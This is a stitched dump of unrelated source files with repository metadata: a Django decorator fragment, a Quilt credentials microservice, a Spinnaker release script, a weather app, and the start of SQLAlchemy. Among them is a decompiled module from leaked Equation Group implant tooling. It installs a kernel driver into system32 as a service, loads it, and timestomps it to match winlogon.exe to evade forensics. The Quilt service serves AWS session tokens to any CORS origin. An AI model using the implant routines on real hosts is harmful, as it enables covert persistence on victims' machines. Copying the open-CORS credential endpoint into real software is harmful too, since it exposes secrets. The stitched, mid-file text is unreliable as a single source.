# We only need to check each permission once for a view, so we'll use a set
current_perms = getattr(view_func, '_required_perms', set([]))
view_func._required_perms = current_perms | set(required)
@functools.wraps(view_func, assigned=available_attrs(view_func))
def dec(request, *args, **kwargs):
if request.user.is_authenticated():
if request.user.has_perms(view_func._required_perms):
return view_func(request, *args, **kwargs)
raise NotAuthorized(_("You are not authorized to access %s")
% request.path)
# If we don't have any permissions, just return the original view.
if required:
return dec
else:
return view_func
| apache-2.0 | -4,795,479,006,821,248,000 | 35.042553 | 79 | 0.679752 | false |
quiltdata/quilt | api/python/quilt3/registry.py | 1 | 1604 | """
Microservice that provides temporary user credentials to the catalog
"""
from datetime import timedelta
import boto3
import requests
from botocore.exceptions import ClientError
from flask import Flask
from flask_cors import CORS
from flask_json import as_json
app = Flask(__name__) # pylint: disable=invalid-name
app.config['JSON_USE_ENCODE_METHODS'] = True
app.config['JSON_ADD_STATUS'] = False
sts_client = boto3.client( # pylint: disable=invalid-name
'sts',
)
class ApiException(Exception):
"""
Base class for API exceptions.
"""
def __init__(self, status_code, message):
super().__init__()
self.status_code = status_code
self.message = message
CORS(app, resources={"/api/*": {"origins": "*", "max_age": timedelta(days=1)}})
@app.route('/api/buckets', methods=['GET'])
@as_json
def list_buckets():
"""
Returns an empty list for compatibility
"""
return dict(
buckets=[]
)
@app.route('/api/auth/get_credentials', methods=['GET'])
@as_json
def get_credentials():
"""
Obtains credentials corresponding to your role.
Returns a JSON object with three keys:
AccessKeyId(string): access key ID
SecretKey(string): secret key
SessionToken(string): session token
"""
try:
creds = sts_client.get_session_token()
except ClientError as ex:
print(ex)
raise ApiException(requests.codes.server_error,
"Failed to get credentials for your AWS Account.")
return creds['Credentials']
if __name__ == '__main__':
app.run()
| apache-2.0 | -7,490,552,160,810,158,000 | 22.588235 | 79 | 0.642768 | false |
DarthMaulware/EquationGroupLeaks | Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/windows/driver/__init__.py | 1 | 11721 | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: __init__.py
import dsz
import dsz.file
import dsz.path
import dsz.version
def Install(project, driverName, localDriverName, startValue, typeValue, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if _isDriverSigningEnabled():
dsz.ui.Echo('* Cannot install because driver signing is enabled', dsz.ERROR)
return False
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to install the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if dsz.cmd.Run('registryquery -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
dsz.ui.Echo('%s (%s.sys) is already installed (key exists)' % (project, driverName), dsz.ERROR)
return False
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo('%s (%s.sys) is already installed (file exists)' % (project, driverName), dsz.ERROR)
return False
dsz.ui.Echo('Uploading the SYS')
if dsz.cmd.Run('put "%s" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (localDriverName, systemroot, driverName, project)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo('Matching file time for %s.sys' % driverName)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemroot
else:
matchFile = '%s\\user.exe' % systemroot
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (but continuing anyway)', dsz.WARNING)
keysAdded = True
dsz.ui.Echo('Adding registry keys')
if not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value ErrorControl -type REG_DWORD -data 0' % driverName):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Start -type REG_DWORD -data %u' % (driverName, startValue)):
keysAdded = False
elif not dsz.cmd.Run('registryadd -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -value Type -type REG_DWORD -data %u' % (driverName, typeValue)):
keysAdded = False
if keysAdded:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
return True
def Load(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Loading %s' % driverName)
if dsz.cmd.Run('drivers -load %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def Uninstall(project, driverName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
rtn = True
if len(driverName) == 0:
dsz.ui.Echo('Invalid driver name given', dsz.ERROR)
return False
if ask and not dsz.ui.Prompt('Do you want to uninstall the %s driver (%s.sys)?' % (project, driverName)):
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
if not Unload(driverName):
rtn = False
dsz.ui.Echo('Removing registry key')
if dsz.cmd.Run('registrydelete -hive L -key SYSTEM\\CurrentControlSet\\Services\\%s -recursive' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Removing %s.sys' % driverName)
if dsz.cmd.Run('delete -file "%s\\drivers\\%s.sys"' % (systemroot, driverName)):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
return rtn
def Unload(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
else:
dsz.ui.Echo('Unloading %s' % driverName)
if dsz.cmd.Run('drivers -unload %s' % driverName):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
def VerifyInstall(driverName, startValue, typeValue):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
try:
systemroot = dsz.path.windows.GetSystemPath()
except:
dsz.ui.Echo('* Unable to determine system root', dsz.ERROR)
return False
rtn = True
dsz.ui.Echo('Checking for %s.sys' % driverName)
if dsz.file.Exists('%s.sys' % driverName, '%s\\drivers' % systemroot):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
keyLoc = 'SYSTEM\\CurrentControlSet\\Services\\%s' % driverName
dsz.ui.Echo('Checking for key')
if dsz.cmd.Run('registryquery -hive L -key %s' % keyLoc):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/ErrorControl')
if dsz.cmd.Run('registryquery -hive L -key %s -value ErrorControl' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == 0:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Start')
if dsz.cmd.Run('registryquery -hive L -key %s -value Start' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == startValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
dsz.ui.Echo('Checking for key/Type')
if dsz.cmd.Run('registryquery -hive L -key %s -value Type' % keyLoc, dsz.RUN_FLAG_RECORD):
valueGood = False
try:
type = dsz.cmd.data.Get('Key::Value::Type', dsz.TYPE_STRING)
if type[0] == 'REG_DWORD':
data = dsz.cmd.data.Get('Key::Value::Value', dsz.TYPE_STRING)
if len(data[0]) > 0 and int(data[0]) == typeValue:
valueGood = True
except:
pass
if valueGood:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (value is bad)', dsz.ERROR)
rtn = False
else:
dsz.ui.Echo(' FAILED (value not found)', dsz.ERROR)
rtn = False
return rtn
def VerifyRunning(driverName):
x = dsz.control.Method()
dsz.control.echo.Off()
dsz.control.wow64.Disable()
if len(driverName) == 0:
dsz.ui.Echo('* Invalid driver name given', dsz.ERROR)
return False
dsz.ui.Echo('Getting driver list')
if dsz.cmd.Run('drivers -list -minimal', dsz.RUN_FLAG_RECORD):
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED (query of running drivers failed)', dsz.ERROR)
return False
try:
drivers = dsz.cmd.data.Get('DriverItem', dsz.TYPE_OBJECT)
except:
dsz.ui.Echo(' FAILED (failed to get driver list data)', dsz.ERROR)
return False
lowerDriverName = driverName.lower()
fullLowerDriverName = '%s.sys' % driverName.lower()
dsz.ui.Echo('Checking for %s' % driverName)
for driverObj in drivers:
try:
name = dsz.cmd.data.ObjectGet(driverObj, 'Name', dsz.TYPE_STRING)
namePieces = dsz.path.Split(name[0])
if namePieces[1].lower() == lowerDriverName or namePieces[1].lower() == fullLowerDriverName:
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
return True
except:
pass
dsz.ui.Echo(' FAILED (driver not running)', dsz.ERROR)
return False
def UpgradeDriver(project, drvName, ask=True):
x = dsz.control.Method()
dsz.control.echo.Off()
systemRoot = dsz.path.windows.GetSystemPath()
tmpName = '%s32.sys' % drvName
dsz.ui.Echo('Move existing driver')
if not dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, drvName, systemRoot, tmpName)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
return False
dsz.ui.Echo(' MOVED', dsz.GOOD)
dsz.ui.Echo('Uploading the SYS file')
if not dsz.cmd.Run('put "%s.sys" -name "%s\\drivers\\%s.sys" -permanent -project %s' % (drvName, systemRoot, drvName, project)):
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.cmd.Run('move "%s\\drivers\\%s.sys" "%s\\drivers\\%s"' % (systemRoot, tmpName, systemRoot, drvName))
return False
dsz.ui.Echo(' SUCCESS', dsz.GOOD)
if dsz.version.checks.IsOs64Bit():
matchFile = '%s\\winlogon.exe' % systemRoot
else:
matchFile = '%s\\user.exe' % systemRoot
dsz.ui.Echo('Matching file times for %s.sys with %s' % (drvName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s.sys"' % (matchFile, systemRoot, drvName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Matching file times for %s with %s' % (tmpName, matchFile))
if dsz.cmd.Run('matchfiletimes -src "%s" -dst "%s\\drivers\\%s"' % (matchFile, systemRoot, tmpName)):
dsz.ui.Echo(' MATCHED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.WARNING)
dsz.ui.Echo('Deleting existing driver')
if dsz.cmd.Run('delete -file "%s\\drivers\\%s" -afterreboot' % (systemRoot, tmpName)):
dsz.ui.Echo(' MOVED', dsz.GOOD)
else:
dsz.ui.Echo(' FAILED', dsz.ERROR)
dsz.ui.Echo('Upgrade complete (reboot required)')
return True
def _isDriverSigningEnabled():
if dsz.version.checks.windows.IsVistaOrGreater():
if dsz.version.checks.IsOs64Bit():
return True
return False | unlicense | 6,155,391,410,086,799,000 | 38.073333 | 158 | 0.594233 | false |
Roshan2017/spinnaker | dev/generate_bom.py | 1 | 12830 | #!/usr/bin/python
#
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import datetime
import os
import socket
import sys
import yaml
from annotate_source import Annotator
from spinnaker.run import run_quick
SERVICES = 'services'
VERSION = 'version'
GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG = {
'steps': [
{
'name': 'java:8',
'env': ['GRADLE_USER_HOME=cache'],
'args': []
},
{
'name': 'gcr.io/cloud-builders/docker',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG = {
'steps': [
{
'name': 'gcr.io/cloud-builders/docker',
'dir': 'spinnaker-monitoring-daemon',
'args': []
}
],
'images': [],
'timeout': '3600s'
}
class BomGenerator(Annotator):
"""Provides facilities for generating the Bill of Materials file for the
Spinnaker product release.
This assumes Halyard (https://github.com/spinnaker/halyard) is installed on
the machine this script runs on.
"""
COMPONENTS = [
'clouddriver',
'deck',
'echo',
'front50',
'gate',
'igor',
'orca',
'rosco',
'fiat',
'spinnaker-monitoring',
'spinnaker'
]
def __init__(self, options):
self.__base_dir = options.base_dir
self.__docker_registry = options.docker_registry
self.__bom_file = ''
self.__component_versions = {}
self.__changelog_start_hashes = {} # Hashes to start from when generating changelogs.
self.__toplevel_version = ''
self.__changelog_output = options.changelog_output
self.__alias = options.bom_alias
super(BomGenerator, self).__init__(options)
@classmethod
def init_argument_parser(cls, parser):
"""Initialize command-line arguments."""
parser.add_argument('--base_dir', default='.', required=True,
help="Base directory containing the component's git repositories as subdirectories.")
parser.add_argument('--container_builder', default='gcb',
help="Type of builder to use. Currently, the supported options are {'gcb', 'docker'}.")
parser.add_argument('--docker_registry', default='',
help="Docker registry to push the container images to.")
parser.add_argument('--changelog_output', default='',
help="Output file to write the changelog to.")
parser.add_argument('--bom_alias', default='',
help="Alias to rename the 'real' BOM as. This also sets the Spinnaker version as the alias.")
super(BomGenerator, cls).init_argument_parser(parser)
def __version_from_tag(self, comp):
"""Determine the component version from the 'version-X.Y.Z' git tag.
Args:
comp [string]: Spinnaker component name.
Returns:
[string] Component version with build number and without 'version-'.
"""
version_bump = self.__component_versions[comp]
next_tag_with_build = '{0}-{1}'.format(version_bump.version_str,
self.build_number)
first_dash_idx = next_tag_with_build.index('-')
return next_tag_with_build[first_dash_idx + 1:]
def write_container_builder_gcr_config(self):
"""Write a configuration file for producing Container Images with Google Container Builder for each microservice.
"""
for comp in self.__component_versions:
if comp == 'spinnaker-monitoring':
config = dict(GOOGLE_CONTAINER_BUILDER_MONITORING_BASE_CONFIG)
version = self.__version_from_tag(comp)
versioned_image = '{reg}/monitoring-daemon:{tag}'.format(reg=self.__docker_registry,
tag=version)
config['steps'][0]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
elif comp == 'spinnaker':
pass
else:
config = dict(GOOGLE_CONTAINER_BUILDER_SERVICE_BASE_CONFIG)
gradle_version = self.__version_from_tag(comp)
gradle_cmd = ''
if comp == 'deck':
gradle_cmd = './gradlew build -PskipTests'
else:
gradle_cmd = './gradlew {0}-web:installDist -x test'.format(comp)
config['steps'][0]['args'] = ['bash', '-c', gradle_cmd]
versioned_image = '{reg}/{repo}:{tag}'.format(reg=self.__docker_registry,
repo=comp,
tag=gradle_version)
config['steps'][1]['args'] = ['build', '-t', versioned_image, '-f', 'Dockerfile.slim', '.']
config['images'] = [versioned_image]
config_file = '{0}-gcb.yml'.format(comp)
with open(config_file, 'w') as cfg:
yaml.dump(config, cfg, default_flow_style=True)
def write_docker_version_files(self):
"""Write a file containing the full tag for each microservice for Docker.
"""
for comp in self.__component_versions:
if comp == 'spinnaker':
pass
gradle_version = self.__version_from_tag(comp)
docker_tag = '{reg}/{comp}:{tag}'.format(reg=self.__docker_registry,
comp=comp,
tag=gradle_version)
config_file = '{0}-docker.yml'.format(comp)
with open(config_file, 'w') as cfg:
cfg.write(docker_tag)
def generate_changelog(self):
"""Generate a release changelog and write it to a file.
The changelog contains a section per microservice that describes the
changes made since the last Spinnaker release. It also contains the
version information as well.
"""
changelog = ['Spinnaker {0}\n'.format(self.__toplevel_version)]
for comp, hash in self.__changelog_start_hashes.iteritems():
version = self.__version_from_tag(comp)
# Generate the changelog for the component.
print 'Generating changelog for {comp}...'.format(comp=comp)
# Assumes the remote repository is aliased as 'origin'.
component_url = run_quick('git -C {path} config --get remote.origin.url'
.format(path=comp)).stdout.strip()
if component_url.endswith('.git'):
component_url = component_url.replace('.git', '')
result = run_quick('cd {comp}; clog -r {url} -f {hash} --setversion {version}; cd ..'
.format(comp=comp, url=component_url, hash=hash, version=version))
if result.returncode != 0:
print "Changelog generation failed for {0} with \n{1}\n exiting...".format(comp, result.stdout)
exit(result.returncode)
# Capitalize
comp_cap = comp[0].upper() + comp[1:]
changelog.append('# {0}\n{1}'.format(comp_cap, result.stdout))
print 'Writing changelog...'
# Write the changelog with the toplevel version without the build number.
# This is ok since the changelog is only published if the toplevel version is released.
changelog_file = self.__changelog_output or '{0}-changelog.md'.format(self.__toplevel_version)
with open(changelog_file, 'w') as clog:
clog.write('\n'.join(changelog))
def write_bom(self):
output_yaml = {SERVICES: {}}
for comp in self.__component_versions:
version_bump = self.__component_versions[comp]
if version_bump.major == True:
breaking_change = True
elif version_bump.minor == True:
feature = True
gradle_version = self.__version_from_tag(comp)
version_entry = {VERSION: gradle_version}
if comp == 'spinnaker-monitoring':
# Add two entries for both components of spinnaker-monitoring
output_yaml[SERVICES]['monitoring-third-party'] = dict(version_entry)
output_yaml[SERVICES]['monitoring-daemon'] = dict(version_entry)
else:
output_yaml[SERVICES][comp] = version_entry
timestamp = '{:%Y-%m-%d}'.format(datetime.datetime.now())
self.__toplevel_version = '{0}-{1}'.format(self.branch, timestamp)
toplevel_with_build = '{0}-{1}'.format(self.__toplevel_version, self.build_number)
output_yaml[VERSION] = toplevel_with_build
self.__bom_file = '{0}.yml'.format(toplevel_with_build)
self.write_bom_file(self.__bom_file, output_yaml)
if self.__alias:
output_yaml[VERSION] = self.__alias
self.write_bom_file(self.__alias + '.yml', output_yaml)
def publish_boms(self):
"""Pushes the generated BOMs to a public GCS bucket for Halyard to use.
"""
self.publish_bom(self.__bom_file)
if self.__alias:
self.publish_bom(self.__alias + '.yml')
def write_bom_file(self, filename, output_yaml):
"""Helper function to write the calculated BOM to files.
Args:
filename [string]: Name of the file to write to.
output_yaml [dict]: Dictionary containing BOM information.
"""
with open(filename, 'w') as output_file:
output_yaml['timestamp'] = '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
output_yaml['hostname'] = socket.gethostname()
yaml.dump(output_yaml, output_file, default_flow_style=False)
print 'Wrote BOM to {0}.'.format(filename)
def publish_bom(self, bom_path):
"""Publishes the BOM using Halyard.
Assumes that Halyard is installed and correctly configured on the current
machine.
"""
result = run_quick('hal admin publish bom --color false --bom-path {0}'
.format(bom_path))
if result.returncode != 0:
print "'hal admin publish bom' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def __publish_config(self, component, profile_path):
"""Publishes the yaml configuration consumed by Halyard for the component.
Args:
component [string]: Name of the Spinnaker component.
profile_path [string]: Path to component's yaml configuration file.
"""
for profile in os.listdir(profile_path):
full_profile = os.path.join(profile_path, profile)
if os.path.isfile(full_profile):
result = run_quick(
'hal admin publish profile {0} --color false --bom-path {1} --profile-path {2}'
.format(component, self.__bom_file, full_profile)
)
if result.returncode != 0:
print "'hal admin publish profile' command failed with: \n{0}\n exiting...".format(result.stdout)
exit(result.returncode)
def publish_microservice_configs(self):
for comp in self.COMPONENTS:
if comp == 'spinnaker-monitoring':
daemon_path = '{0}-daemon'.format(comp)
config_path = os.path.join(comp, daemon_path, 'halconfig')
self.__publish_config('monitoring-daemon', config_path)
elif comp == 'spinnaker':
pass
else:
config_path = os.path.join(comp, 'halconfig')
self.__publish_config(comp, config_path)
def determine_and_tag_versions(self):
for comp in self.COMPONENTS:
self.path = os.path.join(self.__base_dir, comp)
self.checkout_branch()
self.parse_git_tree()
self.__changelog_start_hashes[comp] = self.current_version.hash
version_bump = self.tag_head()
self.__component_versions[comp] = version_bump
self.delete_unwanted_tags()
@classmethod
def main(cls):
parser = argparse.ArgumentParser()
cls.init_argument_parser(parser)
options = parser.parse_args()
if options.container_builder not in ['gcb', 'docker']:
raise ValueError(
'Invalid container_builder="{0}"'.format(options.container_builder))
bom_generator = cls(options)
bom_generator.determine_and_tag_versions()
if options.container_builder == 'gcb':
bom_generator.write_container_builder_gcr_config()
elif options.container_builder == 'docker':
bom_generator.write_docker_version_files()
else:
raise NotImplementedError('container_builder="{0}"'.format(
options.container_builder))
bom_generator.write_bom()
bom_generator.publish_boms()
bom_generator.publish_microservice_configs()
bom_generator.generate_changelog()
if __name__ == '__main__':
sys.exit(BomGenerator.main())
| apache-2.0 | 735,947,141,761,425,800 | 37.878788 | 117 | 0.628059 | false |
bakostamas/weather-station | weather.py | 1 | 9237 |
import json, pprint, app_settings, pytz
import connected_sensor
from datetime import datetime
from urllib.request import urlopen # Only in Python 3
weather_list = {}
def get_weather_data(p_city_id, p_type, p_cnt):
"""
Get weather data from openweathermap.org
:param p_city_id: ID of the city
:param p_type: 'DF'=Daily forecast for 7 days, 'F'=3 hours forecast for 5 days, 'NOW'=Weather Now
:param p_cnt: Forecasted days limit, 0=No_limit
:return: weather_data{} (dictionary)
"""
if p_type == 'DF':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast/daily'
elif p_type == 'F':
url_domain = 'http://api.openweathermap.org/data/2.5/forecast'
elif p_type == 'NOW':
url_domain = 'http://api.openweathermap.org/data/2.5/weather'
access_link = url_domain+'?id='+str(p_city_id)+'&appid='+app_settings.appid+'&units='+app_settings.units+\
'&lang='+app_settings.lang+'&mode='+app_settings.mode
if p_cnt > 0:
access_link += '&cnt='+str(p_cnt)
try:
response = urlopen(access_link)
json_data = response.read().decode('utf-8')
weather_data = json.loads(json_data)
except: # If the weather server is unavailable return an empty dictionary
weather_data = {}
return weather_data
class WeatherNow:
"""Weather details for current weather"""
def __init__(self):
if len(weather_list) != 0:
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
self.city_name = weather_list['name']
self.country_code = weather_list['sys']['country']
timestamp = weather_list['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date = date_object.strftime(app_settings.full_date_format)
self.day_of_week = date_object.strftime("%A").capitalize()
self.clouds = weather_list['clouds']['all']
try:
self.wind_dir = weather_list['wind']['deg']
except:
self.wind_dir = '0'
# int() ensures to not display the .0 decimal of the rounded value
self.wind_speed = int(round(weather_list['wind']['speed'] * 3.6, 0)) # converted to Km/h
self.humidity = int(round(weather_list['main']['humidity'], 0))
self.pressure = int(round(weather_list['main']['pressure'], 0))
self.temp_now = round(weather_list['main']['temp'], 1) # rounded to 1 decimal
self.weather_id = weather_list['weather'][0]['id']
self.weather_sum = weather_list['weather'][0]['main']
self.weather_desc = weather_list['weather'][0]['description'].title() # First letters to uppercase
try:
self.rain_volume = weather_list['rain']['3h'] # Rain vloume in the last 3 hours
except:
self.rain_volume = 0
try:
self.snow_volume = weather_list['snow']['3h'] # Snow volume in the last 3 hours
except:
self.snow_volume = 0
timestamp_sunrise = weather_list['sys']['sunrise']
date_object_sunrise = datetime.fromtimestamp(timestamp_sunrise, tz=pytz.timezone(app_settings.timezone))
self.sunrise = date_object_sunrise.strftime(app_settings.time_format)
timestamp_sunset = weather_list['sys']['sunset']
date_object_sunset = datetime.fromtimestamp(timestamp_sunset, tz=pytz.timezone(app_settings.timezone))
self.sunset = date_object_sunset.strftime(app_settings.time_format)
# Define the weather icon and css template based on it's day or night now:
if date_object_sunrise < self.query_date and self.query_date < date_object_sunset:
self.weather_icon = 'wi-owm-day-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_day
else:
self.weather_icon = 'wi-owm-night-' + str(self.weather_id)
self.color_theme = app_settings.color_theme_night
# Get sensor's data
self.sensor_data = connected_sensor.SensorData()
self.sensor_data.pressure_r = round(self.sensor_data.pressure)
class WeatherForecast:
"""Weather details for forecast"""
def __init__(self):
# Init the arrays with 0 values at index zero color_theme
self.date = ["0"]
self.date2 = ["0"]
self.day_of_week = ["0"]
self.clouds = ["0"]
self.wind_dir = ["0"]
self.wind_speed = ["0"]
self.humidity = ["0"]
self.pressure = ["0"]
self.temp_day = ["0"]
self.temp_min = ["0"]
self.temp_max = ["0"]
self.temp_diff = ["0"]
self.temp_diff_trend = ["0"]
self.temp_night = ["0"]
self.temp_eve = ["0"]
self.temp_morn = ["0"]
self.weather_id = ["0"]
self.weather_sum = ["0"]
self.weather_desc = ["0"]
if len(weather_list) != 0:
self.city_name = weather_list['city']['name']
self.country_code = weather_list['city']['country']
self.query_date = datetime.now(pytz.timezone(app_settings.timezone))
for list_index in range(1, 6): # weather_list['list']
timestamp = weather_list['list'][list_index]['dt']
date_object = datetime.fromtimestamp(timestamp, tz=pytz.timezone(app_settings.timezone))
self.date.append(date_object.strftime(app_settings.short_date_format)) # The same date in different format
self.date2.append(date_object.strftime("%Y-%m-%d")) # The same date in different format
self.day_of_week.append(date_object.strftime("%A").capitalize())
self.clouds.append(weather_list['list'][list_index]['clouds'])
self.wind_dir.append(weather_list['list'][list_index]['deg'])
self.wind_speed.append(int(round(weather_list['list'][list_index]['speed'] * 3.6, 0))) # converted to Km/h
self.humidity.append(int(round(weather_list['list'][list_index]['humidity'], 0)))
self.pressure.append(int(round(weather_list['list'][list_index]['pressure'],0)))
self.temp_day.append(int(round(weather_list['list'][list_index]['temp']['day'], 0)))
self.temp_min.append(int(round(weather_list['list'][list_index]['temp']['min'], 0)))
self.temp_max.append(int(round(weather_list['list'][list_index]['temp']['max'], 0)))
# "temp_diff" is the temperature difference between the given day's max and the previous day's max.
difference = calculate_temp_dif(self.temp_max[list_index], self.temp_max[list_index-1])
self.temp_diff.append(difference['temp_diff'])
self.temp_diff_trend.append(difference['temp_diff_trend'])
self.temp_night.append(int(round(weather_list['list'][list_index]['temp']['night'], 0)))
self.temp_eve.append(int(round(weather_list['list'][list_index]['temp']['eve'], 0)))
self.temp_morn.append(int(round(weather_list['list'][list_index]['temp']['morn'], 0)))
self.weather_id.append(weather_list['list'][list_index]['weather'][0]['id'])
self.weather_sum.append(weather_list['list'][list_index]['weather'][0]['main'])
self.weather_desc.append(weather_list['list'][list_index]['weather'][0]['description'].title()) # First letters to uppercase
def fetch_weather_now(p_city_code):
"""
Fetch the current weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'NOW' # Current weather
weather_list = get_weather_data(p_city_code, access_type, 0)
weather = WeatherNow()
return weather
def fetch_weather_forecast(p_city_code):
"""
Fetch the forecasted weather
:param p_city_code: ID of the city
"""
global weather_list
weather_list.clear()
access_type = 'DF' # Daily forecast
weather_list = get_weather_data(p_city_code, access_type, 0)
weather = WeatherForecast() # parameter: index in the weather_list
return weather
def calculate_temp_dif(temp_today, temp_last_day):
"""
Calculate the difference between two temperature and determine the appropriate icon code
:param temp_today: Today's max temperature forecast
:param temp_last_day: Yesterday's max temperature
"""
diff = int(temp_today) - int(temp_last_day)
if diff > 0:
temp_diff = '+' + str(diff)
temp_diff_trend = ['wi-direction-up', 'red']
elif diff < 0:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-down', 'blue']
else:
temp_diff = str(diff)
temp_diff_trend = ['wi-direction-right', 'green']
return {'temp_diff': temp_diff, 'temp_diff_trend': temp_diff_trend}
# ONLY FOR TESTING PURPOSE:
# weather_list = get_weather_data(3054643, 'DF', 0)
# pprint.pprint(weather_list)
# for list_index in weather_list['list']:
# print(list_index)
#
# print('----')
# print(weather_list['list'][6])
| gpl-3.0 | 1,599,481,039,528,907,800 | 42.570755 | 141 | 0.598354 | false |
michaelBenin/sqlalchemy | lib/sqlalchemy/engine/result.py | 1 | 36000 | # engine/result.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Define result set constructs including :class:`.ResultProxy`
and :class:`.RowProxy."""
from .. import exc, util
from ..sql import expression, sqltypes
import collections
import operator
# This reconstructor is necessary so that pickles with the C extension or
# without use the same Binary format.
